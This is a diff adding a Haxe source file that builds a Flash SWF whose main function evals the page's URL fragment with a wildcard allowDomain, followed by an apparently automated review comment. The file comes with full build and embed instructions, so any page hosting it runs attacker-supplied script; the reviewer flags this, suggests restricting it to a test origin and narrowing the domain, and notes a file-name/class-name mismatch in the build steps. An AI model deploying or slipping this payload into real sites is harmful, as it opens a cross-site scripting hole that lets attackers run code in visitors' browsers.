--- /dev/null
+// xss.hx
+//
+// Purpose:
+// This haxe source file builds a SWF which injects JavaScript into the including page.
+//
+// To build:
+// 1. Acquire the latest stable version of haxe from http://haxe.org/download
+// Note: To run haxe, you may also need Neko (http://nekovm.org/download)
+// 2. Create a file called xss.hx with these contents.
+// 3. Create a file called compile.hxml with the following content:
+// -swf-version 9
+// -swf xss.swf
+// -main xss
+// 4. From the command line, execute:
+// haxe compile.hxml
+//
+// To activate:
+// 1. Take xss.swf generated by haxe and deploy it to your webserver.
+// 2. Embed it into your HTML file with code like the following:
+// <object
+// id="xss" class="hidden"
+// classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000"
+// codebase="http://fpdownload.adobe.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,0,0">
+// <param name="movie" value="xss.swf" />
+// <param name="allowScriptAccess" value="always" />
+// <embed
+// class="hidden"
+// src="xss.swf"
+// allowScriptAccess="always"
+// type="application/x-shockwave-flash"
+// pluginspage="http://www.adobe.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash">
+// </embed>
+// </object>
+//
+
+import flash.external.ExternalInterface;
+
+class Xss {
+
+ public static function main() {
+ flash.system.Security.allowDomain("*");
+ ExternalInterface.call( [ "(function(){setTimeout(\"",
+ "eval(document.location.hash.slice(1))",
+ "\",0);})" ].join('') );
+ }
+
+}
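Review bot: The header comment explains how to build and deploy the SWF but never states the consequence of hosting it. `main()` passes `document.location.hash` to `eval`, and together with `Security.allowDomain("*")` and `allowScriptAccess="always"` this makes every page that embeds the file run whatever script is in its URL fragment. If the file must live in the repository, I would add a line under "Purpose" such as `// Test fixture: serve only from an isolated test origin and remove after use; it evaluates the URL fragment as script.` and keep it out of any path that is published to a production web root. I would also replace the `"*"` in `allowDomain` with the single test host name, since nothing visible here needs a wildcard. Separately, the build steps name the file `xss.hx` and use `-main xss` while the class is declared as `Xss`; Haxe normally expects the module file and the `-main` argument to match the capitalised class name, so the instructions probably need `Xss.hx` and `-main Xss`.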